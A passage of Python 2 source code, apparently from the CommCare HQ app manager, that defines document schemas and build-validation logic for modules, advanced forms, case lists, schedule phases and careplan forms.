# If given, use this string for the case tile markup instead of the default temaplte
custom_xml = StringProperty()
persist_tile_on_forms = BooleanProperty()
# If True, the in form tile can be pulled down to reveal all the case details.
pull_down_tile = BooleanProperty()
def get_tab_spans(self):
'''
Return the starting and ending indices into self.columns deliminating
the columns that should be in each tab.
:return:
'''
tabs = list(self.get_tabs())
ret = []
for tab in tabs:
try:
end = tabs[tab.id + 1].starting_index
except IndexError:
end = len(self.columns)
ret.append((tab.starting_index, end))
return ret
@parse_int([1])
def get_column(self, i):
return self.columns[i].with_id(i % len(self.columns), self)
def rename_lang(self, old_lang, new_lang):
for column in self.columns:
column.rename_lang(old_lang, new_lang)
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
label = DictProperty()
show = BooleanProperty(default=False)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
class CaseSearchProperty(DocumentSchema):
"""
Case properties available to search on.
"""
name = StringProperty()
label = DictProperty()
class CaseSearch(DocumentSchema):
"""
Properties and search command label
"""
command_label = DictProperty(default={'en': 'Search All Cases'})
properties = SchemaListProperty(CaseSearchProperty)
class ParentSelect(DocumentSchema):
active = BooleanProperty(default=False)
relationship = StringProperty(default='parent')
module_id = StringProperty()
class FixtureSelect(DocumentSchema):
"""
Configuration for creating a details screen from a fixture which can be used to pre-filter
cases prior to displaying the case list.
fixture_type: FixtureDataType.tag
display_column: name of the column to display in the list
localize: boolean if display_column actually contains the key for the localized string
variable_column: name of the column whose value should be saved when the user selects an item
xpath: xpath expression to use as the case filter
"""
active = BooleanProperty(default=False)
fixture_type = StringProperty()
display_column = StringProperty()
localize = BooleanProperty(default=False)
variable_column = StringProperty()
xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
short = SchemaProperty(Detail)
long = SchemaProperty(Detail)
@classmethod
def wrap(cls, data):
self = super(DetailPair, cls).wrap(data)
self.short.display = 'short'
self.long.display = 'long'
return self
class CaseListForm(NavMenuItemMediaMixin):
form_id = FormIdProperty('modules[*].case_list_form.form_id')
label = DictProperty()
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
class ModuleBase(IndexedSchema, NavMenuItemMediaMixin, CommentMixin):
name = DictProperty(unicode)
unique_id = StringProperty()
case_type = StringProperty()
case_list_form = SchemaProperty(CaseListForm)
module_filter = StringProperty()
root_module_id = StringProperty()
fixture_select = SchemaProperty(FixtureSelect)
auto_select_case = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
if cls is ModuleBase:
doc_type = data['doc_type']
if doc_type == 'Module':
return Module.wrap(data)
elif doc_type == 'CareplanModule':
return CareplanModule.wrap(data)
elif doc_type == 'AdvancedModule':
return AdvancedModule.wrap(data)
elif doc_type == 'ReportModule':
return ReportModule.wrap(data)
elif doc_type == 'ShadowModule':
return ShadowModule.wrap(data)
else:
raise ValueError('Unexpected doc_type for Module', doc_type)
else:
return super(ModuleBase, cls).wrap(data)
def get_or_create_unique_id(self):
"""
It is the caller's responsibility to save the Application
after calling this function.
WARNING: If called on the same doc in different requests without saving,
this function will return a different uuid each time,
likely causing unexpected behavior
"""
if not self.unique_id:
self.unique_id = random_hex()
return self.unique_id
get_forms = IndexedSchema.Getter('forms')
get_suite_forms = IndexedSchema.Getter('forms')
@parse_int([1])
def get_form(self, i):
try:
return self.forms[i].with_id(i % len(self.forms), self)
except IndexError:
raise FormNotFoundException()
def get_child_modules(self):
return [
module for module in self.get_app().get_modules()
if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
]
@property
def root_module(self):
if self.root_module_id:
return self._parent.get_module_by_unique_id(self.root_module_id)
def requires_case_details(self):
return False
def get_case_types(self):
return set([self.case_type])
def get_module_info(self):
return {
'id': self.id,
'name': self.name,
}
def get_app(self):
return self._parent
def default_name(self):
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
for form in self.get_forms():
form.rename_lang(old_lang, new_lang)
for _, detail, _ in self.get_details():
detail.rename_lang(old_lang, new_lang)
def validate_detail_columns(self, columns):
from corehq.apps.app_manager.suite_xml.const import FIELD_TYPE_LOCATION
from corehq.apps.locations.util import parent_child
hierarchy = None
for column in columns:
if column.field_type == FIELD_TYPE_LOCATION:
hierarchy = hierarchy or parent_child(self.get_app().domain)
try:
LocationXpath('').validate(column.field_property, hierarchy)
except LocationXpathValidationError, e:
yield {
'type': 'invalid location xpath',
'details': unicode(e),
'module': self.get_module_info(),
'column': column,
}
def get_form_by_unique_id(self, unique_id):
for form in self.get_forms():
if form.get_unique_id() == unique_id:
return form
def validate_for_build(self):
errors = []
if self.requires_case_details():
errors.extend(self.get_case_errors(
needs_case_type=True,
needs_case_detail=True
))
if self.case_list_form.form_id:
try:
form = self.get_app().get_form(self.case_list_form.form_id)
except FormNotFoundException:
errors.append({
'type': 'case list form missing',
'module': self.get_module_info()
})
else:
if not form.is_registration_form(self.case_type):
errors.append({
'type': 'case list form not registration',
'module': self.get_module_info(),
'form': form,
})
if self.module_filter:
is_valid, message = validate_xpath(self.module_filter)
if not is_valid:
errors.append({
'type': 'module filter has xpath error',
'xpath_error': message,
'module': self.get_module_info(),
})
return errors
@memoized
def get_subcase_types(self):
'''
Return a set of each case type for which this module has a form that
opens a new subcase of that type.
'''
subcase_types = set()
for form in self.get_forms():
if hasattr(form, 'get_subcase_types'):
subcase_types.update(form.get_subcase_types())
return subcase_types
def get_custom_entries(self):
"""
By default, suite entries are configured by forms, but you can also provide custom
entries by overriding this function.
See ReportModule for an example
"""
return []
def uses_media(self):
"""
Whether the module uses media. If this returns false then media will not be generated
for the module.
"""
return True
def uses_usercase(self):
return False
class ModuleDetailsMixin():
@classmethod
def wrap_details(cls, data):
if 'details' in data:
try:
case_short, case_long, ref_short, ref_long = data['details']
except ValueError:
# "need more than 0 values to unpack"
pass
else:
data['case_details'] = {
'short': case_short,
'long': case_long,
}
data['ref_details'] = {
'short': ref_short,
'long': ref_long,
}
finally:
del data['details']
return data
@property
def case_list_filter(self):
try:
return self.case_details.short.filter
except AttributeError:
return None
@property
def detail_sort_elements(self):
try:
return self.case_details.short.sort_elements
except Exception:
return []
def rename_lang(self, old_lang, new_lang):
super(Module, self).rename_lang(old_lang, new_lang)
for case_list in (self.case_list, self.referral_list):
case_list.rename_lang(old_lang, new_lang)
def export_json(self, dump_json=True, keep_unique_id=False):
source = self.to_json()
if not keep_unique_id:
for form in source['forms']:
del form['unique_id']
return json.dumps(source) if dump_json else source
def get_details(self):
return (
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('ref_short', self.ref_details.short, False),
('ref_long', self.ref_details.long, False),
)
def validate_details_for_build(self):
errors = []
for sort_element in self.detail_sort_elements:
try:
validate_detail_screen_field(sort_element.field)
except ValueError:
errors.append({
'type': 'invalid sort field',
'field': sort_element.field,
'module': self.get_module_info(),
})
if self.case_list_filter:
try:
case_list_filter = interpolate_xpath(self.case_list_filter)
etree.XPath(case_list_filter)
except (etree.XPathSyntaxError, CaseXPathValidationError):
errors.append({
'type': 'invalid filter xpath',
'module': self.get_module_info(),
'filter': self.case_list_filter,
})
for detail in [self.case_details.short, self.case_details.long]:
if detail.use_case_tiles:
if not detail.display == "short":
errors.append({
'type': "invalid tile configuration",
'module': self.get_module_info(),
'reason': _('Case tiles may only be used for the case list (not the case details).')
})
col_by_tile_field = {c.case_tile_field: c for c in detail.columns}
for field in ["header", "top_left", "sex", "bottom_left", "date"]:
if field not in col_by_tile_field:
errors.append({
'type': "invalid tile configuration",
'module': self.get_module_info(),
'reason': _('A case property must be assigned to the "{}" tile field.'.format(field))
})
return errors
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.case_details.short.columns:
yield {
'type': 'no case detail',
'module': module_info,
}
columns = self.case_details.short.columns + self.case_details.long.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
if needs_referral_detail and not self.ref_details.short.columns:
yield {
'type': 'no ref detail',
'module': module_info,
}
class Module(ModuleBase, ModuleDetailsMixin):
"""
A group of related forms, and configuration that applies to them all.
Translates to a top-level menu on the phone.
"""
module_type = 'basic'
case_label = DictProperty()
referral_label = DictProperty()
forms = SchemaListProperty(Form)
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(Module, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = Module(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
case_label={(lang or 'en'): 'Cases'},
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=''):
form = Form(
name={lang if lang else "en": name if name else _("Untitled Form")},
)
self.forms.append(form)
form = self.get_form(-1)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, Form):
new_form = form
elif isinstance(form, AdvancedForm) and not form.actions.get_all_actions():
new_form = Form(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
else:
raise IncompatibleFormTypeException()
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def validate_for_build(self):
errors = super(Module, self).validate_for_build() + self.validate_details_for_build()
if not self.forms and not self.case_list.show:
errors.append({
'type': 'no forms or case list',
'module': self.get_module_info(),
})
return errors
def requires(self):
r = set(["none"])
for form in self.get_forms():
r.add(form.requires)
if self.case_list.show:
r.add('case')
if self.referral_list.show:
r.add('referral')
for val in ("referral", "case", "none"):
if val in r:
return val
def requires_case_details(self):
ret = False
if self.case_list.show:
return True
for form in self.get_forms():
if form.requires_case():
ret = True
break
return ret
@memoized
def all_forms_require_a_case(self):
return all([form.requires == 'case' for form in self.get_forms()])
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return any(form.uses_usercase() for form in self.get_forms())
class AdvancedForm(IndexedFormBase, NavMenuItemMediaMixin):
form_type = 'advanced_form'
form_filter = StringProperty()
actions = SchemaProperty(AdvancedFormActions)
schedule = SchemaProperty(FormSchedule, default=None)
@classmethod
def wrap(cls, data):
# lazy migration to swap keys with values in action preload dict.
# http://manage.dimagi.com/default.asp?162213
load_actions = data.get('actions', {}).get('load_update_cases', [])
for action in load_actions:
preload = action['preload']
if preload and preload.values()[0].startswith('/'):
action['preload'] = {v: k for k, v in preload.items()}
return super(AdvancedForm, cls).wrap(data)
def pre_delete_hook(self):
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this form.".format(error=e, form_id=self.unique_id))
pass
def pre_move_hook(self, from_module, to_module):
if from_module != to_module:
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this module.".format(error=e, form_id=self.unique_id))
pass
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta_advanced(self)
def requires_case(self):
"""Form requires a case that must be selected by the user (excludes autoloaded cases)
"""
return any(not action.auto_select for action in self.actions.load_update_cases)
@property
def requires(self):
return 'case' if self.requires_case() else 'none'
def is_registration_form(self, case_type=None):
"""
Defined as form that opens a single case. If the case is a sub-case then
the form is only allowed to load parent cases (and any auto-selected cases).
"""
reg_actions = self.get_registration_actions(case_type)
if len(reg_actions) != 1:
return False
load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
if not load_actions:
return True
reg_action = reg_actions[0]
if not reg_action.case_indices:
return False
actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
actions_by_tag.pop(reg_action.case_tag)
def check_parents(tag):
"""Recursively check parent actions to ensure that all actions for this form are
either parents of the registration action or else auto-select actions.
"""
if not tag:
return not actions_by_tag or all(
getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
)
try:
parent = actions_by_tag.pop(tag)
except KeyError:
return False
return all(check_parents(p.tag) for p in parent['action'].case_indices)
return all(check_parents(parent.tag) for parent in reg_action.case_indices)
def get_registration_actions(self, case_type=None):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
registration_actions = [
action for action in self.actions.get_open_actions()
if not action.is_subcase or not action.repeat_context
]
if case_type:
registration_actions = [a for a in registration_actions if a.case_type == case_type]
return registration_actions
def uses_case_type(self, case_type, invert_match=False):
def match(ct):
matches = ct == case_type
return not matches if invert_match else matches
return any(action for action in self.actions.load_update_cases if match(action.case_type))
def uses_usercase(self):
return self.uses_case_type(USERCASE_TYPE)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def get_module(self):
return self._parent
def get_phase(self):
module = self.get_module()
return next((phase for phase in module.get_schedule_phases()
for form in phase.get_forms()
if form.unique_id == self.unique_id),
None)
def disable_schedule(self):
self.schedule.enabled = False
phase = self.get_phase()
if phase:
phase.remove_form(self)
def check_actions(self):
errors = []
for action in self.actions.get_subcase_actions():
case_tags = self.actions.get_case_tags()
for case_index in action.case_indices:
if case_index.tag not in case_tags:
errors.append({'type': 'missing parent tag', 'case_tag': case_index.tag})
if isinstance(action, AdvancedOpenCaseAction):
if not action.name_path:
errors.append({'type': 'case_name required', 'case_tag': action.case_tag})
for case_index in action.case_indices:
meta = self.actions.actions_meta_by_tag.get(case_index.tag)
if meta and meta['type'] == 'open' and meta['action'].repeat_context:
if (
not action.repeat_context or
not action.repeat_context.startswith(meta['action'].repeat_context)
):
errors.append({'type': 'subcase repeat context',
'case_tag': action.case_tag,
'parent_tag': case_index.tag})
errors.extend(self.check_case_properties(
subcase_names=action.get_property_names(),
case_tag=action.case_tag
))
for action in self.actions.get_all_actions():
if not action.case_type and (not isinstance(action, LoadUpdateAction) or not action.auto_select):
errors.append({'type': "no case type in action", 'case_tag': action.case_tag})
if isinstance(action, LoadUpdateAction) and action.auto_select:
mode = action.auto_select.mode
if not action.auto_select.value_key:
key_names = {
AUTO_SELECT_CASE: _('Case property'),
AUTO_SELECT_FIXTURE: _('Lookup Table field'),
AUTO_SELECT_USER: _('custom user property'),
AUTO_SELECT_RAW: _('custom XPath expression'),
}
if mode in key_names:
errors.append({'type': 'auto select key', 'key_name': key_names[mode]})
if not action.auto_select.value_source:
source_names = {
AUTO_SELECT_CASE: _('Case tag'),
AUTO_SELECT_FIXTURE: _('Lookup Table tag'),
}
if mode in source_names:
errors.append({'type': 'auto select source', 'source_name': source_names[mode]})
elif mode == AUTO_SELECT_CASE:
case_tag = action.auto_select.value_source
if not self.actions.get_action_from_tag(case_tag):
errors.append({'type': 'auto select case ref', 'case_tag': action.case_tag})
errors.extend(self.check_case_properties(
all_names=action.get_property_names(),
case_tag=action.case_tag
))
if self.form_filter:
form_filter_references_case = (
xpath_references_case(self.form_filter) or
xpath_references_user_case(self.form_filter)
)
if form_filter_references_case:
if not any(action for action in self.actions.load_update_cases if not action.auto_select):
errors.append({'type': "filtering without case"})
def generate_paths():
for action in self.actions.get_all_actions():
for path in action.get_paths():
yield path
errors.extend(self.check_paths(generate_paths()))
return errors
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
errors = []
if xml_valid:
for error in self.check_actions():
error.update(error_meta)
errors.append(error)
module = self.get_module()
if validate_module:
errors.extend(module.get_case_errors(
needs_case_type=False,
needs_case_detail=module.requires_case_details(),
needs_referral_detail=False,
))
return errors
def get_case_updates(self, case_type):
updates = set()
format_key = self.get_case_property_name_formatter()
for action in self.actions.get_all_actions():
if action.case_type == case_type:
updates.update(format_key(*item)
for item in action.case_properties.iteritems())
if self.schedule and self.schedule.enabled and self.source:
xform = self.wrapped_xform()
self.add_stuff_to_xform(xform)
scheduler_updates = xform.get_scheduler_case_updates()[case_type]
else:
scheduler_updates = set()
return updates.union(scheduler_updates)
@memoized
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
parent_types = set()
case_properties = set()
for subcase in self.actions.get_subcase_actions():
if subcase.case_type == case_type:
case_properties.update(
subcase.case_properties.keys()
)
for case_index in subcase.case_indices:
parent = self.actions.get_action_from_tag(case_index.tag)
if parent:
parent_types.add((parent.case_type, case_index.reference_id or 'parent'))
return parent_types, case_properties
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_translations=True)
}
for action in self.actions.load_update_cases:
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
for question_path, name in action.preload.items():
self.add_property_load(
app_case_meta,
action.case_type,
name,
questions,
question_path
)
if action.close_condition.is_active():
meta = app_case_meta.get_type(action.case_type)
meta.add_closer(self.unique_id, action.close_condition)
for action in self.actions.open_cases:
self.add_property_save(
app_case_meta,
action.case_type,
'name',
questions,
action.name_path,
action.open_condition
)
for name, question_path in action.case_properties.items():
self.add_property_save(
app_case_meta,
action.case_type,
name,
questions,
question_path,
action.open_condition
)
meta = app_case_meta.get_type(action.case_type)
meta.add_opener(self.unique_id, action.open_condition)
if action.close_condition.is_active():
meta.add_closer(self.unique_id, action.close_condition)
class SchedulePhaseForm(IndexedSchema):
"""
A reference to a form in a schedule phase.
"""
form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
"""
SchedulePhases are attached to a module.
A Schedule Phase is a grouping of forms that occur within a period and share an anchor
A module should not have more than one SchedulePhase with the same anchor
anchor: Case property containing a date after which this phase becomes active
forms: The forms that are to be filled out within this phase
"""
anchor = StringProperty()
forms = SchemaListProperty(SchedulePhaseForm)
@property
def id(self):
""" A Schedule Phase is 1-indexed """
_id = super(SchedulePhase, self).id
return _id + 1
@property
def phase_id(self):
return "{}_{}".format(self.anchor, self.id)
def get_module(self):
return self._parent
_get_forms = IndexedSchema.Getter('forms')
def get_forms(self):
"""Returns the actual form objects related to this phase"""
module = self.get_module()
return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())
def get_form(self, desired_form):
return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)
def get_phase_form_index(self, form):
"""
Returns the index of the form with respect to the phase
schedule_phase.forms = [a,b,c]
schedule_phase.get_phase_form_index(b)
=> 1
schedule_phase.get_phase_form_index(c)
=> 2
"""
return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
None)
def remove_form(self, form):
"""Remove a form from the phase"""
idx = self.get_phase_form_index(form)
if idx is None:
raise ScheduleError("That form doesn't exist in the phase")
self.forms.remove(self.forms[idx])
def add_form(self, form):
"""Adds a form to this phase, removing it from other phases"""
old_phase = form.get_phase()
if old_phase is not None and old_phase.anchor != self.anchor:
old_phase.remove_form(form)
if self.get_form(form) is None:
self.forms.append(SchedulePhaseForm(form_id=form.unique_id))
def change_anchor(self, new_anchor):
if new_anchor is None or new_anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
self.anchor = new_anchor
if self.get_module().phase_anchors.count(new_anchor) > 1:
raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
module_type = 'advanced'
case_label = DictProperty()
forms = SchemaListProperty(AdvancedForm)
case_details = SchemaProperty(DetailPair)
product_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
has_schedule = BooleanProperty()
schedule_phases = SchemaListProperty(SchedulePhase)
get_schedule_phases = IndexedSchema.Getter('schedule_phases')
search_config = SchemaListProperty(CaseSearch)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = AdvancedModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
product_details=DetailPair(
short=Detail(
columns=[
DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Product")},
field='name',
model='product',
),
],
),
long=Detail(),
),
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=''):
form = AdvancedForm(
name={lang if lang else "en": name if name else _("Untitled Form")},
)
form.schedule = FormSchedule(enabled=False)
self.forms.append(form)
form = self.get_form(-1)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, AdvancedForm):
new_form = form
elif isinstance(form, Form):
new_form = AdvancedForm(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
actions = form.active_actions()
open = actions.get('open_case', None)
update = actions.get('update_case', None)
close = actions.get('close_case', None)
preload = actions.get('case_preload', None)
subcases = actions.get('subcases', None)
case_type = from_module.case_type
base_action = None
if open:
base_action = AdvancedOpenCaseAction(
case_type=case_type,
case_tag='open_{0}_0'.format(case_type),
name_path=open.name_path,
open_condition=open.condition,
case_properties=update.update if update else {},
)
new_form.actions.open_cases.append(base_action)
elif update or preload or close:
base_action = LoadUpdateAction(
case_type=case_type,
case_tag='load_{0}_0'.format(case_type),
case_properties=update.update if update else {},
preload=preload.preload if preload else {}
)
if from_module.parent_select.active:
app = self.get_app()
select_chain = get_select_chain(app, from_module, include_self=False)
for n, link in enumerate(reversed(list(enumerate(select_chain)))):
i, module = link
new_form.actions.load_update_cases.append(LoadUpdateAction(
case_type=module.case_type,
case_tag='_'.join(['parent'] * (i + 1)),
details_module=module.unique_id,
case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
))
base_action.case_indices = [CaseIndex(tag='parent')]
if close:
base_action.close_condition = close.condition
new_form.actions.load_update_cases.append(base_action)
if subcases:
for i, subcase in enumerate(subcases):
open_subcase_action = AdvancedOpenCaseAction(
case_type=subcase.case_type,
case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
name_path=subcase.case_name,
open_condition=subcase.condition,
case_properties=subcase.case_properties,
repeat_context=subcase.repeat_context,
case_indices=[CaseIndex(
tag=base_action.case_tag if base_action else '',
reference_id=subcase.reference_id,
)]
)
new_form.actions.open_cases.append(open_subcase_action)
else:
raise IncompatibleFormTypeException()
if index:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def rename_lang(self, old_lang, new_lang):
super(AdvancedModule, self).rename_lang(old_lang, new_lang)
self.case_list.rename_lang(old_lang, new_lang)
def requires_case_details(self):
if self.case_list.show:
return True
for form in self.forms:
if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
return True
def all_forms_require_a_case(self):
return all(form.requires_case() for form in self.forms)
def get_details(self):
return (
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('product_short', self.product_details.short, self.get_app().commtrack_enabled),
('product_long', self.product_details.long, False),
)
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.case_details.short.columns:
yield {
'type': 'no case detail',
'module': module_info,
}
if self.get_app().commtrack_enabled and not self.product_details.short.columns:
for form in self.forms:
if self.case_list.show or \
any(action.show_product_stock for action in form.actions.load_update_cases):
yield {
'type': 'no product detail',
'module': module_info,
}
break
columns = self.case_details.short.columns + self.case_details.long.columns
if self.get_app().commtrack_enabled:
columns += self.product_details.short.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
def validate_for_build(self):
errors = super(AdvancedModule, self).validate_for_build()
if not self.forms and not self.case_list.show:
errors.append({
'type': 'no forms or case list',
'module': self.get_module_info(),
})
if self.case_list_form.form_id:
forms = self.forms
case_tag = None
loaded_case_types = None
for form in forms:
info = self.get_module_info()
form_info = {"id": form.id if hasattr(form, 'id') else None, "name": form.name}
non_auto_select_actions = [a for a in form.actions.load_update_cases if not a.auto_select]
this_forms_loaded_case_types = {action.case_type for action in non_auto_select_actions}
if loaded_case_types is None:
loaded_case_types = this_forms_loaded_case_types
elif loaded_case_types != this_forms_loaded_case_types:
errors.append({
'type': 'all forms in case list module must load the same cases',
'module': info,
'form': form_info,
})
if not non_auto_select_actions:
errors.append({
'type': 'case list module form must require case',
'module': info,
'form': form_info,
})
elif len(non_auto_select_actions) != 1:
for index, action in reversed(list(enumerate(non_auto_select_actions))):
if (
index > 0 and
non_auto_select_actions[index - 1].case_tag not in (p.tag for p in action.case_indices)
):
errors.append({
'type': 'case list module form can only load parent cases',
'module': info,
'form': form_info,
})
case_action = non_auto_select_actions[-1] if non_auto_select_actions else None
if case_action and case_action.case_type != self.case_type:
errors.append({
'type': 'case list module form must match module case type',
'module': info,
'form': form_info,
})
# set case_tag if not already set
case_tag = case_action.case_tag if not case_tag and case_action else case_tag
if case_action and case_action.case_tag != case_tag:
errors.append({
'type': 'all forms in case list module must have same case management',
'module': info,
'form': form_info,
'expected_tag': case_tag
})
if case_action and case_action.details_module and case_action.details_module != self.unique_id:
errors.append({
'type': 'forms in case list module must use modules details',
'module': info,
'form': form_info,
})
return errors
def _uses_case_type(self, case_type, invert_match=False):
return any(form.uses_case_type(case_type, invert_match) for form in self.forms)
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return self._uses_case_type(USERCASE_TYPE)
@property
def phase_anchors(self):
return [phase.anchor for phase in self.schedule_phases]
def get_or_create_schedule_phase(self, anchor):
"""Returns a tuple of (phase, new?)"""
if anchor is None or anchor.strip() == '':
raise ScheduleError(_("You can't create a phase without an anchor property"))
phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
is_new_phase = False
if phase is None:
self.schedule_phases.append(SchedulePhase(anchor=anchor))
# TODO: is there a better way of doing this?
phase = list(self.get_schedule_phases())[-1] # get the phase from the module so we know the _parent
is_new_phase = True
return (phase, is_new_phase)
def _clear_schedule_phases(self):
self.schedule_phases = []
def update_schedule_phases(self, anchors):
""" Take a list of anchors, reorders, deletes and creates phases from it """
old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
self._clear_schedule_phases()
for anchor in anchors:
try:
self.schedule_phases.append(old_phases.pop(anchor))
except KeyError:
self.get_or_create_schedule_phase(anchor)
deleted_phases_with_forms = [anchor for anchor, phase in old_phases.iteritems() if len(phase.forms)]
if deleted_phases_with_forms:
raise ScheduleError(_("You can't delete phases with anchors "
"{phase_anchors} because they have forms attached to them").format(
phase_anchors=(", ").join(deleted_phases_with_forms)))
return self.get_schedule_phases()
def update_schedule_phase_anchors(self, new_anchors):
""" takes a list of tuples (id, new_anchor) and updates the phase anchors """
for anchor in new_anchors:
id = anchor[0] - 1
new_anchor = anchor[1]
try:
list(self.get_schedule_phases())[id].change_anchor(new_anchor)
except IndexError:
pass # That phase wasn't found, so we can't change it's anchor. Ignore it
class CareplanForm(IndexedFormBase, NavMenuItemMediaMixin):
form_type = 'careplan_form'
mode = StringProperty(required=True, choices=['create', 'update'])
custom_case_updates = DictProperty()
case_preload = DictProperty()
@classmethod
def wrap(cls, data):
if cls is CareplanForm:
doc_type = data['doc_type']
if doc_type == 'CareplanGoalForm':
return CareplanGoalForm.wrap(data)
elif doc_type == 'CareplanTaskForm':
return CareplanTaskForm.wrap(data)
else:
raise ValueError('Unexpected doc_type for CareplanForm', doc_type)
else:
return super(CareplanForm, cls).wrap(data)
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(CareplanForm, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_care_plan(self)
def get_case_updates(self, case_type):
if case_type == self.case_type:
format_key = self.get_case_property_name_formatter()
return [format_key(*item) for item in self.case_updates().iteritems()]
else:
return []
def get_case_type(self):
return self.case_type
def get_parent_case_type(self):
return self._parent.case_type
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
parent_types = set()
case_properties = set()
if case_type == self.case_type:
if case_type == CAREPLAN_GOAL:
parent_types.add((module_case_type, 'parent'))
elif case_type == CAREPLAN_TASK:
parent_types.add((CAREPLAN_GOAL, 'goal'))
case_properties.update(self.case_updates().keys())
return parent_types, case_properties
def is_registration_form(self, case_type=None):
return self.mode == 'create' and (not case_type or self.case_type == case_type)
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_translations=True)
}
meta = app_case_meta.get_type(self.case_type)
for name, question_path in self.case_updates().items():
self.add_property_save(
app_case_meta,
self.case_type,
name,
questions,
question_path
)
for name, question_path in self.case_preload.items():
self.add_property_load(
app_case_meta,
self.case_type,
name,
questions,
question_path
)
meta.add_opener(self.unique_id, FormActionCondition(
type='always',
))
meta.add_closer(self.unique_id, FormActionCondition(
type='if',
question=self.close_path,
answer='yes',
))
class CareplanGoalForm(CareplanForm):
case_type = CAREPLAN_GOAL
name_path = StringProperty(required=True, default='/data/name')
